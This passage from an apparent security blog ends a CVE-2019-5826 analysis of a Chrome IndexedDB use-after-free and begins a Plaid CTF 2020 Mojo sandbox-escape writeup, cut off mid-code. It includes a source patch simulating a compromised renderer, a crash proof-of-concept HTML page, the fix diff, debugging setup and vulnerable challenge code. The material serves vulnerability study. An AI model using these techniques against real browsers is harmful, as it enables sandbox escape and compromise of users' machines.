How to trigger the UAF</h4><ul><li><p>From the analysis above, calling the following three functions in order leaves <code>database_map</code> holding a dangling pointer to freed memory.</p><ul><li><code>Open(db1)</code></li><li><code>DeleteDatabase(db1, force_close=True)</code></li><li><code>AbortTransactionsForDatabase</code></li></ul></li><li><p>After that, a heap spray that reclaims the freed memory is all we need to exploit the bug.</p></li><li><p>There is a catch, though: how do we call these three functions through IndexedDBFactory from the renderer process? The renderer's JS API can call IndexedDB's <code>open</code> and <code>deleteDatabase</code>, but it cannot reach the <code>AbortTransactionsForDatabase</code> interface. There is a second problem as well: <strong>we cannot guarantee that the functions run in the browser process in the order we expect</strong>, because most IndexedDB APIs in JS are <strong>asynchronous</strong>, so the three functions in the browser may not run to completion one after another.</p></li><li><p>Yet we must issue the three calls synchronously and in order from the renderer process, which is why <strong>this vulnerability can only be exploited on top of a <code>renderer RCE</code></strong>.</p><p>Because a <strong><code>renderer RCE</code> can patch the renderer process itself</strong>, the attacker can patch the renderer <strong>so that the three functions are called synchronously</strong> (that is, one after another).</p><blockquote><p>This is also why the <strong>environment setup</strong> applies a patch to the Chrome source: patching by hand simulates what a renderer RCE would do.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// third_party/blink/renderer/modules/indexeddb/web_idb_factory_impl.cc</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">WebIDBFactoryImpl::Open</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">       
std::make_unique&lt;IndexedDBDatabaseCallbacksImpl&gt;(</span></span></span><br><span class="line"><span class="params"><span class="function">           base::WrapUnique(database_callbacks));</span></span></span><br><span class="line"><span class="params"><span class="function">   DCHECK(!name.IsNull());</span></span></span><br><span class="line"><span class="params"><span class="function">   factory_-&gt;Open(GetCallbacksProxy(std::move(callbacks_impl)),</span></span></span><br><span class="line"><span class="params"><span class="function">                  GetDatabaseCallbacksProxy(std::move(database_callbacks_impl)),</span></span></span><br><span class="line"><span class="params"><span class="function">                  name, version, transaction_id);</span></span></span><br><span class="line"><span class="params"><span class="function">+  <span class="keyword">if</span> (version == <span class="number">3</span>) &#123;</span></span></span><br><span class="line"><span class="params"><span class="function">+    mojom::blink::IDBCallbacksAssociatedPtrInfo ptr_info;</span></span></span><br><span class="line"><span class="params"><span class="function">+    <span class="keyword">auto</span> request = mojo::MakeRequest(&amp;ptr_info);</span></span></span><br><span class="line"><span class="params"><span class="function">+    factory_-&gt;DeleteDatabase(std::move(ptr_info), origin, name, <span class="literal">true</span>);</span></span></span><br><span class="line"><span class="params"><span class="function">+    factory_-&gt;AbortTransactionsForDatabase(origin, base::OnceCallback&lt;<span class="type">void</span>(blink::mojom::IDBStatus)&gt;());</span></span></span><br><span class="line"><span class="params"><span class="function">+  &#125;</span></span></span><br><span class="line"><span class="params"><span class="function"> &#125;</span></span></span><br></pre></td></tr></table></figure></li></ul><h4 id="d-POC">d. 
POC</h4><p>I made small changes to the PoC from <code>issue 941746</code>: the new PoC drops the unnecessary statements and makes Chrome crash.</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span>=<span class="string">&quot;text/javascript&quot;</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">async</span> <span class="keyword">function</span> <span class="title function_">poc</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="comment">/*</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">                Run open, deleteDatabase and AbortTransactionsForDatabase synchronously, in order, in the Chrome browser process</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">                Once they finish, a dangling pointer is left behind</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">       
     */</span></span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">await</span> <span class="variable language_">window</span>.<span class="property">indexedDB</span>.<span class="title function_">open</span>(<span class="string">&quot;db1&quot;</span>, <span class="number">3</span>);</span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// Try to use the dangling pointer; this should crash</span></span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">window</span>.<span class="property">indexedDB</span>.<span class="title function_">deleteDatabase</span>(<span class="string">&quot;db1&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span> <span class="attr">onload</span>=<span class="string">&quot;poc()&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure><p>Chrome crashes as expected.</p><p><img src="/2020/10/CVE-2019-5826/crash.png" alt="img"></p><blockquote><p>The extra <code>nice</code> in the screenshot comes from a printf statement added along with the Chrome patch.</p><p>Its output shows that the patched code was executed.</p></blockquote><h3 id="4-后记">4. 
Postscript</h3><p>Below is the code after the Chrome team's fix. The <a href="https://chromium.googlesource.com/chromium/src.git/+/eaf2e8bce3855d362e53034bd83f0e3aff8714e4%5E%21/">patch</a> makes sure that every connection in the <code>connections_</code> set is closed. Before the patch, the code relied on an <strong>iterator</strong> to decide whether all connections had been closed; after the patch, it checks whether the set still contains elements, which makes the code somewhat safer.</p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@@ -1949,10 +1949,10 @@</span></span><br><span class="line">     request-&gt;AbortForForceClose();</span><br><span class="line">   &#125;</span><br><span class="line"></span><br><span class="line"><span class="deletion">-  auto it = connections_.begin();</span></span><br><span class="line"><span class="deletion">-  while (it != connections_.end()) &#123;</span></span><br><span class="line"><span class="deletion">-    IndexedDBConnection* connection = *it++;</span></span><br><span class="line"><span class="addition">+  while (!connections_.empty()) &#123;</span></span><br><span class="line"><span class="addition">+    IndexedDBConnection* connection = *connections_.begin();</span></span><br><span class="line">     connection-&gt;ForceClose();</span><br><span class="line"><span class="addition">+    connections_.erase(connection);</span></span><br><span class="line">   &#125;</span><br><span class="line">   DCHECK(connections_.empty());</span><br><span class="line">   DCHECK(!active_request_);</span><br></pre></td></tr></table></figure><h2 id="四、参考">IV. References</h2><ul><li><p><a 
href="https://www.blackhat.com/us-19/briefings/schedule/index.html#the-most-secure-browser-pwning-chrome-from--to--16274">The Most Secure Browser? Pwning Chrome from 2016 to 2019</a></p><ul><li><a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Feng-The-Most-Secure-Browser-Pwning-Chrome-From-2016-To-2019.pdf">Presentation Slides</a></li><li><a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Feng-The-Most-Secure-Browser-Pwning-Chrome-From-2016-To-2019-wp.pdf">White Paper</a> (<strong>very useful</strong>)</li></ul></li><li><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-5826">NVD - CVE-2019-5826 Detail</a></p></li><li><p><a href="https://crbug.com/941746">Chrome Issue 941746: Security: UAF in content::IndexedDBDatabase</a></p></li><li><p><a href="https://www.anquanke.com/post/id/183809#h3-3">通过IndexedDB条件竞争实现Chrome沙箱逃逸（上）</a> (Chrome sandbox escape via an IndexedDB race condition, part 1; in Chinese)</p><blockquote><p>That article <strong>does not cover</strong> the UAF studied here, but it still provides useful background on <code>IndexedDB</code>.</p></blockquote></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;Introduction&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;CVE-2019-5826 is a use-after-free vulnerability in IndexedDB in Google Chrome. In versions before 73.0.3683.86 it allows an attacker to trigger the UAF and &lt;strong&gt;escape the sandbox&lt;/strong&gt; by &lt;strong&gt;chaining it with a renderer RCE vulnerability&lt;/strong&gt;.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;</summary>
    
    
    
    <category term="vulnerability analysis" scheme="https://kiprey.github.io/categories/vulnerability-analysis/"/>
    
    <category term="chrome" scheme="https://kiprey.github.io/categories/vulnerability-analysis/chrome/"/>
    
    
    <category term="chrome" scheme="https://kiprey.github.io/tags/chrome/"/>
    
  </entry>
  
  <entry>
    <title>Plaid CTF 2020 mojo Writeup</title>
    <link href="https://kiprey.github.io/2020/10/mojo/"/>
    <id>https://kiprey.github.io/2020/10/mojo/</id>
    <published>2020-10-03T07:20:22.000Z</published>
    <updated>2025-11-24T03:59:40.049Z</updated>
    
    <content type="html"><![CDATA[<h2 id="1-简介">1. Introduction</h2><p>Plaid CTF 2020 <code>mojo</code> is an introductory Chromium sandbox escape challenge and a good first step into <code>chrome</code> exploitation.</p><p>Challenge source - <a href="https://ctftime.org/task/11314">ctftime - task11314</a></p><span id="more"></span><h2 id="2-环境配置">2. Environment setup</h2><ul><li><p>The commands in the <code>dockerfile</code> show that <code>chrome</code> is launched by <code>visit.sh</code>, whose contents are:</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line"><span class="built_in">timeout</span> 20 ./chrome --headless --disable-gpu --remote-debugging-port=1338 --enable-blink-features=MojoJS,MojoJSTest <span class="string">&quot;<span class="variable">$1</span>&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>From <code>visit.sh</code>, the command that launches chrome is</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./chrome --headless --disable-gpu --remote-debugging-port=1338 --enable-blink-features=MojoJS,MojoJSTest &lt;URL&gt;</span><br></pre></td></tr></table></figure><p>We can add a <code>--user-data-dir</code> argument to make <a href="https://chromedevtools.github.io/devtools-protocol/">DevTools</a> more convenient to use.</p><blockquote><p>The most visible effect of this argument is that, while JS code runs, <strong>all <code>console.log</code> output is also echoed to the terminal</strong>.</p></blockquote><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Basics: Using DevTools as protocol client</span><br><span 
class="line">The Developer Tools front-end can attach to a remotely running Chrome instance for debugging. For this scenario to work, you should start your host Chrome instance with the remote-debugging-port command line switch:</span><br><span class="line"></span><br><span class="line">chrome.exe --remote-debugging-port=9222</span><br><span class="line">Then you can start a separate client Chrome instance, using a distinct user profile:</span><br><span class="line"></span><br><span class="line">chrome.exe --user-data-dir=&lt;someDir&gt;</span><br><span class="line">Now you can navigate to the given port from your client and attach to any of the discovered tabs for debugging: http://localhost:9222</span><br></pre></td></tr></table></figure><p>So the command we <strong>actually use</strong> to launch chrome is</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./chrome --headless --disable-gpu --remote-debugging-port=1338 --user-data-dir=./userdata --enable-blink-features=MojoJS,MojoJSTest &lt;URL&gt;</span><br></pre></td></tr></table></figure><blockquote><p><code>--headless</code>: headless mode, which Google added in Chrome 59, lets you use Chrome without opening its UI while behaving the same as regular Chrome. With this flag chrome starts no GUI; remove the flag if you need the GUI.</p><p><code>--enable-blink-features</code>: enables one or more Blink runtime-enabled features. Here it enables <code>MojoJS</code>.</p></blockquote></li><li><p>The first run failed on my machine with <code>No usable sandbox</code>.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span 
class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Kiprey @ Kipwn in /usr/class/CTFs/mojo/chrome [15:10:00] C:1</span></span><br><span class="line">$ ./chrome --headless --disable-gpu --remote-debugging-port=1338 --user-data-dir=./userdata --enable-blink-features=MojoJS test.html</span><br><span class="line">[1003/151007.365372:FATAL:zygote_host_impl_linux.cc(116)] No usable sandbox! Update your kernel or see https://chromium.googlesource.com/chromium/src/+/master/docs/linux/suid_sandbox_development.md <span class="keyword">for</span> more information on developing with the SUID sandbox. 
If you want to live dangerously and need an immediate workaround, you can try using --no-sandbox.</span><br><span class="line"><span class="comment">#0 0x560df69de579 base::debug::CollectStackTrace()</span></span><br><span class="line"><span class="comment">#1 0x560df69426f3 base::debug::StackTrace::StackTrace()</span></span><br><span class="line"><span class="comment">#2 0x560df6954475 logging::LogMessage::~LogMessage()</span></span><br><span class="line"><span class="comment">#3 0x560df824a22e service_manager::ZygoteHostImpl::Init()</span></span><br><span class="line"><span class="comment">#4 0x560df652ad37 content::ContentMainRunnerImpl::Initialize()</span></span><br><span class="line"><span class="comment">#5 0x560df657965a service_manager::Main()</span></span><br><span class="line"><span class="comment">#6 0x560df6529351 content::ContentMain()</span></span><br><span class="line"><span class="comment">#7 0x560df657849d headless::(anonymous namespace)::RunContentMain()</span></span><br><span class="line"><span class="comment">#8 0x560df657819b headless::HeadlessShellMain()</span></span><br><span class="line"><span class="comment">#9 0x560df3feac27 ChromeMain</span></span><br><span class="line"><span class="comment">#10 0x7f953511cbbb __libc_start_main</span></span><br><span class="line"><span class="comment">#11 0x560df3feaa6a _start</span></span><br><span class="line"></span><br><span class="line">Received signal 6</span><br><span class="line"><span class="comment">#0 0x560df69de579 base::debug::CollectStackTrace()</span></span><br><span class="line"><span class="comment">#1 0x560df69426f3 base::debug::StackTrace::StackTrace()</span></span><br><span class="line"><span class="comment">#2 0x560df69de120 base::debug::(anonymous namespace)::StackDumpSignalHandler()</span></span><br><span class="line"><span class="comment">#3 0x7f95373c7520 (/usr/lib/x86_64-linux-gnu/libpthread-2.29.so+0x1351f)</span></span><br><span class="line"><span class="comment">#4 
0x7f953512ff61 gsignal</span></span><br><span class="line"><span class="comment">#5 0x7f953511b535 abort</span></span><br><span class="line"><span class="comment">#6 0x560df69dd075 base::debug::BreakDebugger()</span></span><br><span class="line"><span class="comment">#7 0x560df6954914 logging::LogMessage::~LogMessage()</span></span><br><span class="line"><span class="comment">#8 0x560df824a22e service_manager::ZygoteHostImpl::Init()</span></span><br><span class="line"><span class="comment">#9 0x560df652ad37 content::ContentMainRunnerImpl::Initialize()</span></span><br><span class="line"><span class="comment">#10 0x560df657965a service_manager::Main()</span></span><br><span class="line"><span class="comment">#11 0x560df6529351 content::ContentMain()</span></span><br><span class="line"><span class="comment">#12 0x560df657849d headless::(anonymous namespace)::RunContentMain()</span></span><br><span class="line"><span class="comment">#13 0x560df657819b headless::HeadlessShellMain()</span></span><br><span class="line"><span class="comment">#14 0x560df3feac27 ChromeMain</span></span><br><span class="line"><span class="comment">#15 0x7f953511cbbb __libc_start_main</span></span><br><span class="line"><span class="comment">#16 0x560df3feaa6a _start</span></span><br><span class="line">  r8: 0000000000000000  r9: 00007ffcf028b6e0 r10: 0000000000000008 r11: 0000000000000246</span><br><span class="line"> r12: 00007ffcf028c9a8 r13: 00007ffcf028b980 r14: 00007ffcf028c9b0 r15: aaaaaaaaaaaaaaaa</span><br><span class="line">  di: 0000000000000002  si: 00007ffcf028b6e0  bp: 00007ffcf028b930  bx: 00007ffcf028b9a4</span><br><span class="line">  dx: 0000000000000000  ax: 0000000000000000  cx: 00007f953512ff61  sp: 00007ffcf028b6e0</span><br><span class="line">  ip: 00007f953512ff61 efl: 0000000000000246 cgf: 002b000000000033 erf: 0000000000000000</span><br><span class="line"> trp: 0000000000000000 msk: 0000000000000000 cr2: 0000000000000000</span><br><span class="line">[end of stack 
trace]</span><br><span class="line">Calling _exit(1). Core file will not be generated.</span><br></pre></td></tr></table></figure><p>Run the following command to enable unprivileged user namespaces - <a href="https://github.com/puppeteer/puppeteer/blob/main/docs/troubleshooting.md#setting-up-chrome-linux-sandbox">sandbox troubleshooting reference</a></p><blockquote><p>Linux namespaces are a lightweight virtualization mechanism - <a href="https://www.cnblogs.com/long123king/p/3535462.html">reference</a></p></blockquote><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> sysctl -w kernel.unprivileged_userns_clone=1</span><br></pre></td></tr></table></figure><p>After that, chrome runs normally.</p></li><li><p>When debugging the browser, it is best to run a local web server <strong>rather than have the browser open a local HTML file directly</strong>, because <strong>the two use different protocols</strong>: a web server is reached over <code>http</code>, while a local file is reached over <code>file</code>.</p><p>Serving the page from a local server avoids behavioral differences between the file and http schemes, such as differences in available APIs and in cross-origin request handling.</p><p>Here we can use Python's built-in http.server module to start a web server:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -m http.server 8000</span><br></pre></td></tr></table></figure></li><li><p>Debug chrome with a <code>gdb script</code></p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># gdbinit</span></span><br><span class="line"><span class="comment"># load symbols</span></span><br><span class="line">file ./chrome</span><br><span class="line"><span class="comment"># set the launch arguments</span></span><br><span class="line"><span class="built_in">set</span> args --headless --disable-gpu --remote-debugging-port=1338 --user-data-dir=./userdata --enable-blink-features=MojoJS 
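http://localhost:8000/test.html</span><br><span class="line"><span class="comment"># keep debugging the parent process after a fork</span></span><br><span class="line"><span class="built_in">set</span> follow-fork-mode parent</span><br></pre></td></tr></table></figure><p>Then run the following command to start debugging.</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gdb -x gdbinit</span><br></pre></td></tr></table></figure></li></ul><h2 id="3-Mojo简介">3. Introduction to Mojo</h2><ul><li><p>The sandbox is the cornerstone of Chrome's security architecture. Chrome confines most of the web attack surface (DOM rendering, script execution, media decoding and so on) to sandboxed processes. A central process, called the browser process, runs entirely without a sandbox. Chrome's processes have to talk to each other to coordinate their work, which requires <strong>communication between processes, or between modules inside one process</strong> (<code>IPC, Inter-Process Communication</code>). Mojo is the mechanism Chromium provides for IPC.</p></li><li><p>In Chrome, Mojo itself is implemented in C++, but it provides bindings for both C++ and JS.</p></li><li><p>By enabling the MojoJS blink bindings (passing <code>--enable-blink-features=MojoJS</code> on the Chrome command line) we can emulate a compromised renderer process. These bindings expose the Mojo platform directly to JavaScript, so we can bypass the regular Blink bindings entirely and call into Mojo straight from JS.</p><blockquote><p>Put simply: the <code>--enable-blink-features=MojoJS</code> flag turns on Mojo's JS bindings, so page JS can call them directly, which makes exploitation easier.</p></blockquote></li><li><p>For more information, see the <a href="https://chromium.googlesource.com/chromium/src.git/+/master/mojo/README.md">Mojo Docs</a></p></li></ul><h2 id="4-漏洞分析">4. Vulnerability analysis</h2><blockquote><p>Note: before reading the analysis, please read the following carefully</p><ul><li><p><a href="https://www.jianshu.com/p/ce068f112945">Mojo &amp; Services 简介</a> (an introduction to Mojo &amp; Services, in Chinese)</p></li><li><p><a href="https://blog.csdn.net/tornmy/article/details/82748058">chromium mojo 快速入门</a> (a Chromium Mojo quick start, in Chinese)</p></li><li><p><strong>Important!</strong> <strong><a href="https://blog.wuhao13.xin/1001.html">利用Mojo IPC的UAF漏洞实现Chrome浏览器沙箱逃逸</a></strong> (escaping the Chrome sandbox via a Mojo IPC UAF, in Chinese)</p></li></ul><blockquote><p>That translation is not very accurate; reading the <a href="https://theori.io/research/escaping-chrome-sandbox/">original</a> directly is recommended.</p></blockquote><p>Make sure you understand <strong>the further details about Mojo</strong> and <strong>the pointer-lifetime bug class</strong> described there. This challenge is adapted from the vulnerability in that article.</p></blockquote><h3 id="a-代码提取">a. 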
Extracting the code</h3><blockquote><p>The challenge ships a <code>plaidstore.diff</code> file, which shows a newly declared Mojo interface. We need to exploit the bugs in it by calling the corresponding MojoJS bindings.</p></blockquote><p><code>plaidstore.diff</code> shows that this build implements a new interface, <code>PlaidStore</code>. Pulled out of the diff, the relevant code falls into three groups:</p><ul><li><p>The first group is snippets added to existing Chrome code.</p><p>A search shows that the challenge registers a new callback in <code>PopulateFrameBinders</code> - <a href="https://source.chromium.org/chromium/chromium/src/+/master:content/browser/browser_interface_binders.cc;l=743;bpv=0;bpt=1">source</a></p><blockquote><p>Cross-referencing the <code>chrome</code> source gives the call hierarchy</p><p><code>BrowserInterfaceBrokerImpl::PopulateBinderMap</code> -&gt; <code>PopulateBinderMap</code> -&gt; <code>PopulateFrameBinders</code></p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">PopulateFrameBinders</span><span class="params">(RenderFrameHostImpl* host, mojo::BinderMap* map)</span> </span>&#123;</span><br><span class="line">  <span class="comment">//....</span></span><br><span class="line">    <span class="comment">// newly added by the challenge</span></span><br><span class="line">    map-&gt;<span class="built_in">Add</span>&lt;blink::mojom::PlaidStore&gt;(</span><br><span class="line">      base::<span class="built_in">BindRepeating</span>(&amp;RenderFrameHostImpl::CreatePlaidStore,</span><br><span class="line">                          base::<span class="built_in">Unretained</span>(host)));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span 
class="function"><span class="type">void</span> <span class="title">RenderFrameHostImpl::CreatePlaidStore</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    mojo::PendingReceiver&lt;blink::mojom::PlaidStore&gt; receiver)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    PlaidStoreImpl::<span class="built_in">Create</span>(<span class="keyword">this</span>, std::<span class="built_in">move</span>(receiver));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>The second group is a Mojo-specific interface file, from which the interface <code>xx</code> is generated. The actual implementation of that interface is <code>xxImpl</code>.</p><p>For example, the interface defined below is <code>PlaidStore</code>, while its C++ implementation is the <code>PlaidStoreImpl</code> class.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// PlaidStore.mojom</span></span><br><span class="line"><span class="keyword">module</span> blink.mojom;</span><br><span class="line"></span><br><span class="line"><span class="comment">// This interface provides a data store</span></span><br><span class="line">interface PlaidStore</span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Stores data in the data store</span></span><br><span class="line">    <span class="built_in">StoreData</span>(string key, array&lt;uint8&gt; data);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Gets data 
from the data store</span></span><br><span class="line">    <span class="built_in">GetData</span>(string key, uint32 count) =&gt; (array&lt;uint8&gt; data);</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>The last group is <code>PlaidStoreImpl</code>, the C++ class that implements the declared <code>PlaidStore</code> interface.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span 
class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">namespace</span> content</span><br><span class="line">&#123;</span><br><span class="line">    PlaidStoreImpl::<span class="built_in">PlaidStoreImpl</span>(</span><br><span class="line">        RenderFrameHost *render_frame_host)</span><br><span class="line">        : <span class="built_in">render_frame_host_</span>(render_frame_host) &#123;&#125;</span><br><span class="line"></span><br><span class="line">    PlaidStoreImpl::~<span class="built_in">PlaidStoreImpl</span>() &#123;&#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">PlaidStoreImpl::StoreData</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">const</span> std::string &amp;key,</span></span></span><br><span class="line"><span class="params"><span class="function">        <span 
class="type">const</span> std::vector&lt;<span class="type">uint8_t</span>&gt; &amp;data)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (!render_frame_host_-&gt;<span class="built_in">IsRenderFrameLive</span>())</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        data_store_[key] = data;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">PlaidStoreImpl::GetData</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">const</span> std::string &amp;key,</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">uint32_t</span> count,</span></span></span><br><span class="line"><span class="params"><span class="function">        GetDataCallback callback)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (!render_frame_host_-&gt;<span class="built_in">IsRenderFrameLive</span>())</span><br><span class="line">        &#123;</span><br><span class="line">            std::<span class="built_in">move</span>(callback).<span class="built_in">Run</span>(&#123;&#125;);</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">auto</span> it = data_store_.<span class="built_in">find</span>(key);</span><br><span class="line">        <span class="keyword">if</span> (it == data_store_.<span class="built_in">end</span>())</span><br><span 
